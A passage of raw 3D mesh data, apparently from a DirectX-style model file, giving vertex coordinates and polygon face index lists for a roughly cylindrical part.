-0.599078;-0.525080;-1.463595;, -0.593502;-0.523267;-1.469461;, -0.585531;-0.520678;-1.471974;, -0.560826;-0.512650;-1.471975;, -0.556046;-0.511097;-1.474489;, -0.553655;-0.510320;-1.480355;, -0.552063;-0.509802;-1.506330;, -0.551265;-0.509543;-1.518060;, -0.546484;-0.507991;-1.521413;, -0.539312;-0.505660;-1.521413;, -0.539312;-0.505660;-1.525603;, -0.520983;-0.499704;-1.526441;, -0.521780;-0.499963;-1.516387;, -0.627218;-0.504914;-1.437619;, -0.623887;-0.504563;-1.439294;, -0.608884;-0.502987;-1.439294;, -0.607219;-0.502812;-1.439294;, -0.607219;-0.502812;-1.441808;, -0.607220;-0.502812;-1.454377;, -0.603887;-0.502461;-1.463594;, -0.598053;-0.501849;-1.469460;, -0.589720;-0.500972;-1.471974;, -0.563886;-0.498257;-1.471975;, -0.558887;-0.497732;-1.474489;, -0.556387;-0.497468;-1.480354;, -0.554720;-0.497293;-1.506330;, -0.553888;-0.497206;-1.518060;, -0.548887;-0.496681;-1.521413;, -0.541388;-0.495893;-1.521413;, -0.541388;-0.495893;-1.525603;, -0.522221;-0.493878;-1.526441;, -0.523053;-0.493967;-1.516387;, -0.627218;-0.476887;-1.437619;, -0.623887;-0.477237;-1.439294;, -0.608884;-0.478812;-1.439294;, -0.607219;-0.478989;-1.439294;, -0.607219;-0.478989;-1.441808;, -0.607220;-0.478989;-1.454377;, -0.603887;-0.479339;-1.463594;, -0.598053;-0.479951;-1.469460;, -0.589720;-0.480828;-1.471974;, -0.563886;-0.483543;-1.471975;, -0.558887;-0.484069;-1.474489;, -0.556387;-0.484330;-1.480354;, -0.554720;-0.484505;-1.506330;, -0.553888;-0.484594;-1.518060;, -0.548887;-0.485120;-1.521413;, -0.541388;-0.485909;-1.521413;, -0.541388;-0.485909;-1.525603;, -0.522221;-0.487922;-1.526441;, -0.523053;-0.487834;-1.516387;, -0.621390;-0.449471;-1.437619;, -0.618203;-0.450506;-1.439294;, -0.603859;-0.455167;-1.439294;, -0.602266;-0.455685;-1.439294;, -0.602266;-0.455685;-1.441808;, -0.602266;-0.455685;-1.454378;, -0.599078;-0.456721;-1.463595;, -0.593502;-0.458534;-1.469461;, -0.585531;-0.461123;-1.471974;, -0.560826;-0.469150;-1.471975;, -0.556046;-0.470703;-1.474489;, -0.553655;-0.471480;-1.480355;, -0.552063;-0.471999;-1.506330;, -0.551265;-0.472257;-1.518060;, -0.546484;-0.473811;-1.521413;, -0.539312;-0.476141;-1.521413;, -0.539312;-0.476141;-1.525603;, -0.520983;-0.482096;-1.526441;, -0.521780;-0.481838;-1.516387;, -0.609992;-0.423866;-1.437619;, -0.607090;-0.425542;-1.439294;, -0.594027;-0.433084;-1.439295;, -0.592576;-0.433921;-1.439295;, -0.592576;-0.433921;-1.441809;, -0.592576;-0.433921;-1.454378;, -0.589674;-0.435597;-1.463595;, -0.584593;-0.438530;-1.469461;, -0.577338;-0.442719;-1.471974;, -0.554842;-0.455707;-1.471975;, -0.550488;-0.458221;-1.474489;, -0.548311;-0.459478;-1.480355;, -0.546860;-0.460316;-1.506330;, -0.546135;-0.460734;-1.518060;, -0.541780;-0.463250;-1.521413;, -0.535250;-0.467019;-1.521413;, -0.535250;-0.467019;-1.525603;, -0.518560;-0.476656;-1.526441;, -0.519286;-0.476237;-1.516387;, -0.593516;-0.401191;-1.437620;, -0.591026;-0.403434;-1.439295;, -0.579818;-0.413526;-1.439295;, -0.578572;-0.414648;-1.439295;, -0.578572;-0.414648;-1.441809;, -0.578573;-0.414648;-1.454378;, -0.576081;-0.416890;-1.463595;, -0.571723;-0.420815;-1.469461;, -0.565497;-0.426421;-1.471975;, -0.546194;-0.443803;-1.471975;, -0.542458;-0.447167;-1.474489;, -0.540588;-0.448849;-1.480355;, -0.539345;-0.449971;-1.506330;, -0.538723;-0.450531;-1.518061;, -0.534986;-0.453896;-1.521413;, -0.529381;-0.458941;-1.521413;, -0.529381;-0.458941;-1.525604;, -0.515060;-0.471836;-1.526441;, -0.515681;-0.471276;-1.516387;, -0.572689;-0.382437;-1.437620;, -0.570718;-0.385149;-1.439295;, -0.561853;-0.397351;-1.439296;, -0.560868;-0.398707;-1.439296;, -0.560868;-0.398707;-1.441809;, -0.560869;-0.398707;-1.454379;, -0.558899;-0.401418;-1.463596;, -0.555451;-0.406163;-1.469462;, -0.550528;-0.412943;-1.471975;, -0.535257;-0.433957;-1.471975;, -0.532304;-0.438024;-1.474490;, -0.530827;-0.440058;-1.480355;, -0.529841;-0.441413;-1.506331;, -0.529349;-0.442092;-1.518061;, -0.526394;-0.446159;-1.521413;, -0.521960;-0.452260;-1.521413;, -0.521960;-0.452260;-1.525604;, -0.510634;-0.467851;-1.526441;, -0.511127;-0.467174;-1.516387;, -0.548417;-0.368423;-1.437621;, -0.547052;-0.371485;-1.439296;, -0.540917;-0.385264;-1.439296;, -0.540237;-0.386795;-1.439296;, -0.540237;-0.386795;-1.441810;, -0.540238;-0.386795;-1.454379;, -0.538874;-0.389857;-1.463596;, -0.536489;-0.395215;-1.469462;, -0.533081;-0.402870;-1.471975;, -0.522515;-0.426599;-1.471976;, -0.520472;-0.431193;-1.474490;, -0.519448;-0.433490;-1.480355;, -0.518766;-0.435020;-1.506331;, -0.518426;-0.435786;-1.518061;, -0.516380;-0.440378;-1.521413;, -0.513314;-0.447267;-1.521414;, -0.513314;-0.447267;-1.525604;, -0.505476;-0.464874;-1.526441;, -0.505816;-0.464108;-1.516387;, -0.521760;-0.359762;-1.437622;, -0.521062;-0.363040;-1.439297;, -0.517926;-0.377794;-1.439297;, -0.517579;-0.379433;-1.439297;, -0.517579;-0.379433;-1.441810;, -0.517580;-0.379433;-1.454380;, -0.516883;-0.382712;-1.463597;, -0.515663;-0.388448;-1.469463;, -0.513921;-0.396645;-1.471976;, -0.508521;-0.422053;-1.471976;, -0.507475;-0.426971;-1.474490;, -0.506952;-0.429429;-1.480356;, -0.506607;-0.431068;-1.506331;, -0.506432;-0.431889;-1.518061;, -0.505386;-0.436807;-1.521414;, -0.503819;-0.444182;-1.521414;, -0.503819;-0.444182;-1.525604;, -0.499810;-0.463034;-1.526442;, -0.499985;-0.462213;-1.516387;, -0.493886;-0.356833;-1.437623;, -0.493886;-0.360185;-1.439298;, -0.493886;-0.375267;-1.439298;, -0.493886;-0.376943;-1.439298;, -0.493886;-0.376943;-1.441811;, -0.493886;-0.376943;-1.454380;, -0.493887;-0.380294;-1.463597;, -0.493887;-0.386160;-1.469463;, -0.493887;-0.394540;-1.471976;, -0.493887;-0.420515;-1.471976;, -0.493887;-0.425542;-1.474491;, -0.493887;-0.428056;-1.480356;, -0.493887;-0.429732;-1.506332;, -0.493888;-0.430571;-1.518062;, -0.493888;-0.435597;-1.521414;, -0.493888;-0.443139;-1.521414;, -0.493888;-0.443139;-1.525605;, -0.493888;-0.462411;-1.526442;, -0.493888;-0.461573;-1.516388;, -0.466012;-0.359762;-1.437623;, -0.466707;-0.363040;-1.439298;, -0.469844;-0.377794;-1.439298;, -0.470191;-0.379433;-1.439298;, -0.470191;-0.379433;-1.441812;, -0.470192;-0.379433;-1.454381;, -0.470891;-0.382712;-1.463598;, -0.472109;-0.388448;-1.469464;, -0.473852;-0.396645;-1.471977;, -0.479253;-0.422053;-1.471977;, -0.480299;-0.426971;-1.474491;, -0.480820;-0.429429;-1.480356;, -0.481170;-0.431068;-1.506332;, -0.481343;-0.431889;-1.518062;, -0.482390;-0.436807;-1.521414;, -0.483958;-0.444182;-1.521414;, -0.483958;-0.444182;-1.525605;, -0.487964;-0.463034;-1.526442;, -0.487792;-0.462213;-1.516388;, -0.439355;-0.368423;-1.437624;, -0.440718;-0.371485;-1.439299;, -0.446855;-0.385264;-1.439299;, -0.447535;-0.386795;-1.439299;, -0.447536;-0.386795;-1.441812;, -0.447536;-0.386795;-1.454382;, -0.448899;-0.389857;-1.463599;, -0.451285;-0.395215;-1.469464;, -0.454692;-0.402870;-1.471977;, -0.465260;-0.426599;-1.471977;, -0.467302;-0.431193;-1.474491;, -0.468327;-0.433490;-1.480357;, -0.469007;-0.435020;-1.506332;, -0.469349;-0.435786;-1.518062;, -0.471395;-0.440378;-1.521415;, -0.474462;-0.447267;-1.521414;, -0.474463;-0.447267;-1.525605;, -0.482299;-0.464874;-1.526442;, -0.481958;-0.464108;-1.516388;, -0.415082;-0.382437;-1.437625;, -0.417051;-0.385149;-1.439299;, -0.425920;-0.397351;-1.439299;, -0.426904;-0.398707;-1.439299;, -0.426904;-0.398707;-1.441813;, -0.426904;-0.398707;-1.454382;, -0.428874;-0.401418;-1.463599;, -0.432322;-0.406163;-1.469465;, -0.437247;-0.412943;-1.471978;, -0.452516;-0.433957;-1.471978;, -0.455471;-0.438024;-1.474492;, -0.456947;-0.440058;-1.480357;, -0.457934;-0.441413;-1.506332;, -0.458427;-0.442092;-1.518063;, -0.461381;-0.446159;-1.521415;, -0.465815;-0.452260;-1.521415;, -0.465815;-0.452260;-1.525605;, -0.477142;-0.467851;-1.526442;, -0.476650;-0.467174;-1.516388;, -0.394253;-0.401191;-1.437625;, -0.396744;-0.403434;-1.439300;, -0.407953;-0.413526;-1.439300;, -0.409199;-0.414648;-1.439300;, -0.409199;-0.414648;-1.441813;, -0.409199;-0.414648;-1.454383;, -0.411690;-0.416890;-1.463600;, -0.416050;-0.420815;-1.469465;, -0.422276;-0.426421;-1.471978;, -0.441579;-0.443803;-1.471978;, -0.445316;-0.447167;-1.474492;, -0.447184;-0.448849;-1.480357;, -0.448431;-0.449971;-1.506333;, -0.449053;-0.450531;-1.518063;, -0.452790;-0.453896;-1.521415;, -0.458395;-0.458941;-1.521415;, -0.458395;-0.458941;-1.525605;, -0.472715;-0.471836;-1.526442;, -0.472092;-0.471276;-1.516388;, -0.377779;-0.423866;-1.437625;, -0.380682;-0.425542;-1.439301;, -0.393744;-0.433084;-1.439300;, -0.395195;-0.433921;-1.439300;, -0.395195;-0.433921;-1.441814;, -0.395195;-0.433921;-1.454383;, -0.398100;-0.435597;-1.463600;, -0.403178;-0.438530;-1.469466;, -0.410435;-0.442719;-1.471979;, -0.432931;-0.455707;-1.471978;, -0.437285;-0.458221;-1.474492;, -0.439461;-0.459478;-1.480358;, -0.440913;-0.460316;-1.506333;, -0.441640;-0.460734;-1.518063;, -0.445994;-0.463250;-1.521415;, -0.452524;-0.467019;-1.521415;, -0.452524;-0.467019;-1.525606;, -0.469216;-0.476656;-1.526442;, -0.468489;-0.476237;-1.516388;, -0.366379;-0.449471;-1.437626;, -0.369567;-0.450506;-1.439301;, -0.383913;-0.455167;-1.439300;, -0.385506;-0.455685;-1.439300;, -0.385506;-0.455685;-1.441814;, -0.385506;-0.455685;-1.454383;, -0.388693;-0.456721;-1.463600;, -0.394272;-0.458534;-1.469466;, -0.402242;-0.461123;-1.471979;, -0.426946;-0.469150;-1.471978;, -0.431727;-0.470703;-1.474492;, -0.434119;-0.471480;-1.480358;, -0.435712;-0.471999;-1.506333;, -0.436510;-0.472257;-1.518063;, -0.441291;-0.473811;-1.521415;, -0.448464;-0.476141;-1.521415;, -0.448464;-0.476141;-1.525606;, -0.466794;-0.482096;-1.526442;, -0.465995;-0.481838;-1.516388;, -0.360551;-0.476887;-1.437626;, -0.363885;-0.477237;-1.439301;, -0.378885;-0.478812;-1.439301;, -0.380552;-0.478989;-1.439301;, -0.380552;-0.478989;-1.441814;, -0.380553;-0.478989;-1.454383;, -0.383886;-0.479339;-1.463600;, -0.389720;-0.479951;-1.469466;, -0.398053;-0.480828;-1.471979;, -0.423886;-0.483543;-1.471978;, -0.428886;-0.484069;-1.474492;, -0.431386;-0.484330;-1.480358;, -0.433054;-0.484505;-1.506333;, -0.433888;-0.484594;-1.518063;, -0.438888;-0.485120;-1.521415;, -0.446388;-0.485909;-1.521415;, -0.446388;-0.485909;-1.525606;, -0.465554;-0.487922;-1.526442;, -0.464721;-0.487834;-1.516388;, -0.360551;-0.504914;-1.437626;, -0.363885;-0.504563;-1.439301;, -0.378885;-0.502987;-1.439301;, -0.380552;-0.502812;-1.439301;, -0.380552;-0.502812;-1.441814;, -0.380553;-0.502812;-1.454383;, -0.383886;-0.502461;-1.463600;, -0.389720;-0.501849;-1.469466;, -0.398053;-0.500972;-1.471979;, -0.423886;-0.498257;-1.471978;, -0.428886;-0.497732;-1.474492;, -0.431386;-0.497468;-1.480358;, -0.433054;-0.497293;-1.506333;, -0.433888;-0.497206;-1.518063;, -0.438888;-0.496681;-1.521415;, -0.446388;-0.495893;-1.521415;, -0.446388;-0.495893;-1.525606;, -0.465554;-0.493878;-1.526442;, -0.464721;-0.493967;-1.516388;, -0.366379;-0.532329;-1.437626;, -0.369567;-0.531295;-1.439301;, -0.383913;-0.526633;-1.439300;, -0.385506;-0.526115;-1.439300;, -0.385506;-0.526115;-1.441814;, -0.385506;-0.526115;-1.454383;, -0.388693;-0.525080;-1.463600;, -0.394272;-0.523267;-1.469466;, -0.402242;-0.520678;-1.471979;, -0.426946;-0.512650;-1.471978;, -0.431727;-0.511097;-1.474492;, -0.434119;-0.510320;-1.480358;, -0.435712;-0.509802;-1.506333;, -0.436510;-0.509543;-1.518063;, -0.441291;-0.507991;-1.521415;, -0.448464;-0.505660;-1.521415;, -0.448464;-0.505660;-1.525606;, -0.466794;-0.499704;-1.526442;, -0.465995;-0.499963;-1.516388;, -0.377779;-0.557935;-1.437625;, -0.380682;-0.556258;-1.439301;, -0.393744;-0.548716;-1.439300;, -0.395195;-0.547879;-1.439300;, -0.395195;-0.547879;-1.441814;, -0.395195;-0.547879;-1.454383;, -0.398100;-0.546203;-1.463600;, -0.403178;-0.543271;-1.469466;, -0.410435;-0.539081;-1.471979;, -0.432931;-0.526093;-1.471978;, -0.437285;-0.523580;-1.474492;, -0.439461;-0.522322;-1.480358;, -0.440913;-0.521483;-1.506333;, -0.441640;-0.521065;-1.518063;, -0.445994;-0.518551;-1.521415;, -0.452524;-0.514781;-1.521415;, -0.452524;-0.514781;-1.525606;, -0.469216;-0.505145;-1.526442;, -0.468489;-0.505564;-1.516388;, -0.394253;-0.580610;-1.437625;, -0.396744;-0.578366;-1.439300;, -0.407953;-0.568273;-1.439300;, -0.409199;-0.567152;-1.439300;, -0.409199;-0.567152;-1.441813;, -0.409199;-0.567152;-1.454383;, -0.411690;-0.564910;-1.463600;, -0.416050;-0.560986;-1.469465;, -0.422276;-0.555378;-1.471978;, -0.441579;-0.537998;-1.471978;, -0.445316;-0.534633;-1.474492;, -0.447184;-0.532951;-1.480357;, -0.448431;-0.531830;-1.506333;, -0.449053;-0.531269;-1.518063;, -0.452790;-0.527905;-1.521415;, -0.458395;-0.522859;-1.521415;, -0.458395;-0.522859;-1.525605;, -0.472715;-0.509963;-1.526442;, -0.472092;-0.510523;-1.516388;, -0.415082;-0.599363;-1.437625;, -0.417051;-0.596652;-1.439299;, -0.425920;-0.584450;-1.439299;, -0.426904;-0.583094;-1.439299;, -0.426904;-0.583094;-1.441813;, -0.426904;-0.583094;-1.454382;, -0.428874;-0.580381;-1.463599;, -0.432322;-0.575637;-1.469465;, -0.437247;-0.568858;-1.471978;, -0.452516;-0.547844;-1.471978;, -0.455471;-0.543776;-1.474492;, -0.456947;-0.541743;-1.480357;, -0.457934;-0.540386;-1.506332;, -0.458427;-0.539708;-1.518063;, -0.461381;-0.535641;-1.521415;, -0.465815;-0.529540;-1.521415;, -0.465815;-0.529540;-1.525605;, -0.477142;-0.513948;-1.526442;, -0.476650;-0.514626;-1.516388;, -0.439355;-0.613378;-1.437624;, -0.440718;-0.610315;-1.439299;, -0.446855;-0.596536;-1.439299;, -0.447535;-0.595006;-1.439299;, -0.447536;-0.595006;-1.441812;, -0.447536;-0.595006;-1.454382;, -0.448899;-0.591944;-1.463599;, -0.451285;-0.586584;-1.469464;, -0.454692;-0.578931;-1.471977;, -0.465260;-0.555202;-1.471977;, -0.467302;-0.550608;-1.474491;, -0.468327;-0.548311;-1.480357;, -0.469007;-0.546780;-1.506332;, -0.469349;-0.546014;-1.518062;, -0.471395;-0.541422;-1.521415;, -0.474462;-0.534534;-1.521414;, -0.474463;-0.534534;-1.525605;, -0.482299;-0.516927;-1.526442;, -0.481958;-0.517691;-1.516388;, -0.466012;-0.622038;-1.437623;, -0.466707;-0.618759;-1.439298;, -0.469844;-0.604007;-1.439298;, -0.470191;-0.602367;-1.439298;, -0.470191;-0.602367;-1.441812;, -0.470192;-0.602367;-1.454381;, -0.470891;-0.599089;-1.463598;, -0.472109;-0.593352;-1.469464;, -0.473852;-0.585156;-1.471977;, -0.479253;-0.559748;-1.471977;, -0.480299;-0.554830;-1.474491;, -0.480820;-0.552370;-1.480356;, -0.481170;-0.550733;-1.506332;, -0.481343;-0.549912;-1.518062;, -0.482390;-0.544994;-1.521414;, -0.483958;-0.537618;-1.521414;, -0.483958;-0.537618;-1.525605;, -0.487964;-0.518767;-1.526442;, -0.487792;-0.519586;-1.516388;, -0.492251;-0.627309;-1.425461;, -0.465488;-0.624497;-1.425462;, -0.493886;-0.627482;-1.425461;, -0.522284;-0.624497;-1.425460;, -0.438333;-0.615674;-1.425462;, -0.549438;-0.615674;-1.425459;, -0.425222;-0.608104;-1.425463;, -0.413604;-0.601398;-1.425463;, -0.574164;-0.601398;-1.425459;, -0.595385;-0.582290;-1.425458;, -0.392385;-0.582290;-1.425464;, -0.375602;-0.559191;-1.425464;, -0.598586;-0.577885;-1.425458;, -0.612169;-0.559191;-1.425458;, -0.374963;-0.557757;-1.425464;, -0.363988;-0.533106;-1.425464;, -0.623782;-0.533106;-1.425458;, -0.358051;-0.505176;-1.425465;, -0.624838;-0.528135;-1.425458;, -0.629718;-0.505176;-1.425457;, -0.629718;-0.476624;-1.425457;, -0.358051;-0.501231;-1.425465;, -0.358051;-0.476624;-1.425465;, -0.623782;-0.448695;-1.425458;, -0.363988;-0.448695;-1.425464;, -0.375602;-0.422610;-1.425464;, -0.612169;-0.422610;-1.425458;, -0.392385;-0.399510;-1.425464;, -0.595385;-0.399510;-1.425458;, -0.413604;-0.380403;-1.425463;, -0.574164;-0.380403;-1.425459;, -0.549438;-0.366127;-1.425459;, -0.438333;-0.366127;-1.425462;, -0.465488;-0.357303;-1.425462;, -0.522284;-0.357303;-1.425460;, -0.493886;-0.354318;-1.425461;, -0.314115;-0.496800;-1.425466;, -0.649899;-0.554034;-1.425457;, -0.661227;-0.531803;-1.425457;, -0.449012;-0.631937;-1.425462;, -0.473839;-0.635868;-1.425461;, -0.488474;-0.655107;-1.425461;, -0.515833;-0.660848;-1.425460;, -0.558455;-0.654098;-1.425459;, -0.657969;-0.571446;-1.425457;, -0.647249;-0.593875;-1.425457;, -0.616704;-0.624418;-1.425458;, -0.696081;-0.498039;-1.425456;, -0.682714;-0.522850;-1.425456;, -0.702879;-0.455119;-1.425456;, -0.310221;-0.472223;-1.425466;, -0.301651;-0.513518;-1.425466;, -0.305226;-0.539697;-1.425466;, -0.434355;-0.646560;-1.425463;, -0.409508;-0.644005;-1.425463;, -0.371066;-0.624418;-1.425464;, -0.324840;-0.578191;-1.425465;, -0.293131;-0.459726;-1.425466;, -0.706171;-0.455371;-1.425455;, -0.290127;-0.461606;-1.425466;, -0.699244;-0.499107;-1.425456;, -0.307184;-0.474078;-1.425466;, -0.310647;-0.495944;-1.425466;, -0.298207;-0.512630;-1.425466;, -0.685060;-0.525439;-1.425456;, -0.302039;-0.540696;-1.425466;, -0.663610;-0.534377;-1.425457;, -0.653558;-0.554103;-1.425457;, -0.322144;-0.580150;-1.425465;, -0.661606;-0.571469;-1.425457;, -0.649974;-0.595802;-1.425457;, -0.369107;-0.627115;-1.425464;, -0.618664;-0.627115;-1.425458;, -0.559486;-0.657267;-1.425459;, -0.408561;-0.647216;-1.425463;, -0.450152;-0.635450;-1.425462;, -0.472019;-0.638914;-1.425461;, -0.435574;-0.649995;-1.425463;, -0.486598;-0.658077;-1.425461;, -0.515750;-0.664194;-1.425460;, -0.493886;-0.627482;-1.430919;, -0.465488;-0.624497;-1.430919;, -0.438333;-0.615674;-1.430920;, -0.413605;-0.601398;-1.430921;, -0.392385;-0.582290;-1.430921;, -0.375602;-0.559191;-1.430922;, -0.363988;-0.533106;-1.430922;, -0.358051;-0.505176;-1.430922;, -0.358051;-0.476624;-1.430922;, -0.363988;-0.448695;-1.430922;, -0.375602;-0.422610;-1.430922;, -0.392385;-0.399510;-1.430921;, -0.413605;-0.380403;-1.430921;, -0.438333;-0.366127;-1.430920;, -0.465488;-0.357303;-1.430919;, -0.493886;-0.354318;-1.430919;, -0.522284;-0.357303;-1.430918;, -0.549438;-0.366127;-1.430917;, -0.574165;-0.380403;-1.430917;, -0.595385;-0.399510;-1.430916;, -0.612169;-0.422610;-1.430916;, -0.623782;-0.448695;-1.430915;, -0.629718;-0.476624;-1.430915;, -0.629718;-0.505176;-1.430915;, -0.623782;-0.533106;-1.430915;, -0.612169;-0.559191;-1.430916;, -0.595385;-0.582290;-1.430916;, -0.574165;-0.601398;-1.430917;, -0.549438;-0.615674;-1.430917;, -0.522284;-0.624497;-1.430918;; 1012; 4;47,48,274,272;, 4;48,49,276,274;, 8;280,290,268,270,272,274,276,278;, 4;46,47,272,270;, 4;45,46,270,268;, 4;44,45,268,266;, 14;296,298,255,252,256,258,260,262,264,266,268,290,292,294;, 4;52,53,292,290;, 4;74,52,290,288;, 4;73,74,288,286;, 4;66,73,286,284;, 4;65,66,284,282;, 6;290,280,282,284,286,288;, 4;51,65,282,280;, 4;50,51,280,278;, 4;49,50,278,276;, 4;53,54,294,292;, 4;54,55,296,294;, 4;55,56,298,296;, 4;56,57,255,298;, 4;57,58,252,255;, 4;58,39,256,252;, 4;39,40,258,256;, 4;40,41,260,258;, 4;41,42,262,260;, 4;42,43,264,262;, 4;43,44,266,264;, 4;24,25,332,330;, 4;273,330,332,275;, 4;273,275,48,47;, 4;275,277,49,48;, 4;275,332,334,277;, 4;25,26,334,332;, 4;26,27,336,334;, 4;277,334,336,279;, 4;277,279,50,49;, 4;279,281,51,50;, 4;279,336,338,281;, 4;27,28,338,336;, 4;28,63,340,338;, 4;281,338,340,283;, 4;281,283,65,51;, 4;283,285,66,65;, 4;283,340,342,285;, 4;63,64,342,340;, 4;64,71,344,342;, 4;285,342,344,287;, 4;285,287,73,66;, 4;287,289,74,73;, 4;287,344,346,289;, 4;71,72,346,344;, 4;72,29,303,346;, 4;289,346,303,291;, 4;289,291,52,74;, 4;291,293,53,52;, 4;291,303,300,293;, 4;29,30,300,303;, 4;30,31,304,300;, 4;293,300,304,295;, 4;293,295,54,53;, 4;295,297,55,54;, 4;295,304,306,297;, 4;31,32,306,304;, 4;32,33,308,306;, 4;297,306,308,299;, 4;297,299,56,55;, 4;299,254,57,56;, 4;299,308,310,254;, 4;33,34,310,308;, 4;34,35,312,310;, 4;254,310,312,253;, 4;254,253,58,57;, 4;253,257,39,58;, 4;253,312,314,257;, 4;35,36,314,312;, 4;36,37,316,314;, 4;257,314,316,259;, 4;257,259,40,39;, 4;259,261,41,40;, 4;259,316,318,261;, 4;37,38,318,316;, 4;38,19,320,318;, 4;261,318,320,263;, 4;261,263,42,41;, 4;263,265,43,42;, 4;263,320,322,265;, 4;19,20,322,320;, 4;20,21,324,322;, 4;265,322,324,267;, 4;265,267,44,43;, 4;267,269,45,44;, 4;267,324,326,269;, 4;21,22,326,324;, 4;22,23,328,326;, 4;269,326,328,271;, 4;269,271,46,45;, 4;271,273,47,46;, 4;271,328,330,273;, 4;23,24,330,328;, 4;331,333,25,24;, 4;333,335,26,25;, 4;170,335,333,168;, 5;168,333,331,88,166;, 5;93,164,88,331,329;, 4;329,331,24,23;, 4;327,329,23,22;, 5;93,329,327,154,156;, 3;93,156,158;, 4;158,156,92,94;, 4;160,158,94,84;, 4;162,160,84,83;, 4;164,162,83,87;, 4;164,158,160,162;, 3;158,164,93;, 4;166,164,87,89;, 3;88,164,166;, 4;168,166,89,13;, 4;170,168,13,11;, 4;172,170,11,9;, 4;172,337,335,170;, 4;335,337,27,26;, 4;337,339,28,27;, 4;174,339,337,172;, 4;174,172,9,7;, 4;176,174,7,59;, 4;176,341,339,174;, 4;339,341,63,28;, 4;341,343,64,63;, 4;178,343,341,176;, 4;59,60,178,176;, 4;180,178,60,67;, 4;180,345,343,178;, 4;343,345,71,64;, 4;345,347,72,71;, 4;182,347,345,180;, 4;67,68,182,180;, 4;184,182,68,5;, 4;184,302,347,182;, 4;347,302,29,72;, 4;302,301,30,29;, 4;186,301,302,184;, 4;186,184,5,4;, 4;188,186,4,95;, 5;96,305,301,186,188;, 4;301,305,31,30;, 4;305,307,32,31;, 5;96,143,99,307,305;, 3;190,143,96;, 4;143,190,192,145;, 4;192,190,97,76;, 4;145,192,76,75;, 4;143,145,75,98;, 4;141,143,98,100;, 3;99,143,141;, 5;139,309,307,99,141;, 4;307,309,33,32;, 4;309,311,34,33;, 4;137,311,309,139;, 4;137,139,3,2;, 4;135,137,2,111;, 4;133,135,111,113;, 3;112,135,133;, 5;112,313,311,137,135;, 5;112,121,109,315,313;, 3;133,121,112;, 4;121,133,131,123;, 4;131,133,113,80;, 4;123,131,80,79;, 4;121,123,79,108;, 4;119,121,108,110;, 3;109,121,119;, 5;115,317,315,109,119;, 4;115,119,110,1;, 4;116,115,1,0;, 4;116,319,317,115;, 4;317,319,38,37;, 4;315,317,37,36;, 4;313,315,36,35;, 4;311,313,35,34;, 4;139,141,100,3;, 3;96,188,190;, 4;190,188,95,97;, 4;124,116,0,105;, 5;106,321,319,116,124;, 4;319,321,19,38;, 4;321,323,20,19;, 5;106,148,103,323,321;, 3;126,148,106;, 4;148,126,128,147;, 4;148,147,77,102;, 4;147,128,78,77;, 4;128,126,107,78;, 4;126,124,105,107;, 3;106,124,126;, 3;103,148,150;, 4;150,148,102,104;, 4;152,150,104,17;, 5;152,325,323,103,150;, 4;323,325,21,20;, 4;325,327,22,21;, 4;154,327,325,152;, 4;154,152,17,15;, 4;156,154,15,92;, 4;167,234,232,169;, 4;13,89,167,169;, 4;11,13,169,171;, 4;169,232,230,171;, 4;230,232,14,12;, 4;232,234,85,14;, 4;234,236,86,85;, 4;165,236,234,167;, 4;89,87,165,167;, 4;9,11,171,173;, 4;171,230,228,173;, 4;228,230,12,10;, 4;226,228,10,8;, 4;173,228,226,175;, 4;7,9,173,175;, 4;59,7,175,177;, 4;175,226,224,177;, 4;224,226,8,62;, 4;222,224,62,61;, 4;177,224,222,179;, 4;177,179,60,59;, 4;67,60,179,181;, 4;179,222,220,181;, 4;220,222,61,70;, 4;218,220,70,69;, 4;181,220,218,183;, 4;181,183,68,67;, 4;5,68,183,185;, 4;183,218,216,185;, 4;216,218,69,6;, 3;214,216,6;, 3;214,6,976;, 4;213,214,976,978;, 4;187,214,213,189;, 4;95,4,187,189;, 4;97,95,189,191;, 4;189,213,212,191;, 4;212,213,978,982;, 4;211,212,982,984;, 4;191,212,211,193;, 4;76,97,191,193;, 4;4,5,185,187;, 4;185,216,214,187;, 4;14,85,233,231;, 4;12,14,231,229;, 7;235,237,225,227,229,231,233;, 4;85,86,235,233;, 4;86,81,237,235;, 4;81,82,239,237;, 4;968,225,237,239;, 8;975,968,239,241,243,245,247,249;, 4;90,91,243,241;, 4;82,90,241,239;, 4;91,16,245,243;, 4;16,18,247,245;, 4;18,101,249,247;, 4;101,977,975,249;, 4;977,979,968,975;, 4;979,980,954,968;, 4;940,968,954,939;, 3;942,968,940;, 3;943,968,942;, 4;945,225,968,943;, 3;947,225,945;, 4;950,215,225,947;, 6;223,225,215,217,219,221;, 4;62,8,225,223;, 4;61,62,223,221;, 4;70,61,221,219;, 4;69,70,219,217;, 4;6,69,217,215;, 4;976,6,215,967;, 4;946,967,215,948;, 3;948,215,949;, 3;949,215,952;, 3;952,215,953;, 3;953,215,951;, 3;951,215,950;, 4;944,965,967,946;, 4;956,966,965,944;, 3;956,944,941;, 3;956,941,938;, 3;956,938,937;, 3;956,937,936;, 4;955,956,936,934;, 4;985,984,956,955;, 4;984,982,966,956;, 4;982,978,965,966;, 4;978,976,967,965;, 4;987,985,955,962;, 7;927,961,964,963,962,955,930;, 3;955,931,930;, 3;955,934,931;, 4;988,987,962,963;, 4;990,988,963,964;, 4;991,990,964,961;, 4;997,991,961,960;, 4;996,997,960,959;, 4;994,996,959,958;, 4;993,994,958,957;, 4;995,993,957,971;, 4;992,995,971,972;, 4;989,992,972,973;, 4;986,989,973,974;, 8;925,970,974,973,972,971,957,924;, 4;983,986,974,970;, 4;981,983,970,969;, 4;928,969,970,925;, 3;954,969,928;, 3;954,928,929;, 3;954,929,932;, 3;954,932,933;, 3;954,933,935;, 3;954,935,939;, 4;980,981,969,954;, 3;957,922,924;, 3;957,919,922;, 4;957,958,918,919;, 3;958,920,918;, 3;958,921,920;, 3;958,959,921;, 3;921,959,923;, 4;923,959,960,926;, 4;926,960,961,927;, 4;8,10,227,225;, 4;10,12,229,227;, 4;236,238,81,86;, 4;163,238,236,165;, 4;87,83,163,165;, 4;238,240,82,81;, 4;161,240,238,163;, 4;83,84,161,163;, 30;879,898,917,366,385,404,423,442,461,480,499,518,537,556,575,594,613,632,651,670,689,708,727,746,765,784,803,822,841,860;, 4;157,244,242,159;, 4;94,92,157,159;, 4;92,15,155,157;, 4;155,246,244,157;, 4;244,246,16,91;, 4;242,244,91,90;, 4;246,248,18,16;, 4;153,248,246,155;, 4;15,17,153,155;, 4;17,104,151,153;, 4;151,250,248,153;, 4;248,250,101,18;, 4;250,251,977,101;, 4;149,251,250,151;, 4;104,102,149,151;, 4;240,242,90,82;, 4;159,242,240,161;, 4;84,94,159,161;, 4;652,633,1013,1012;, 4;1012,1013,953,951;, 4;1013,1014,952,953;, 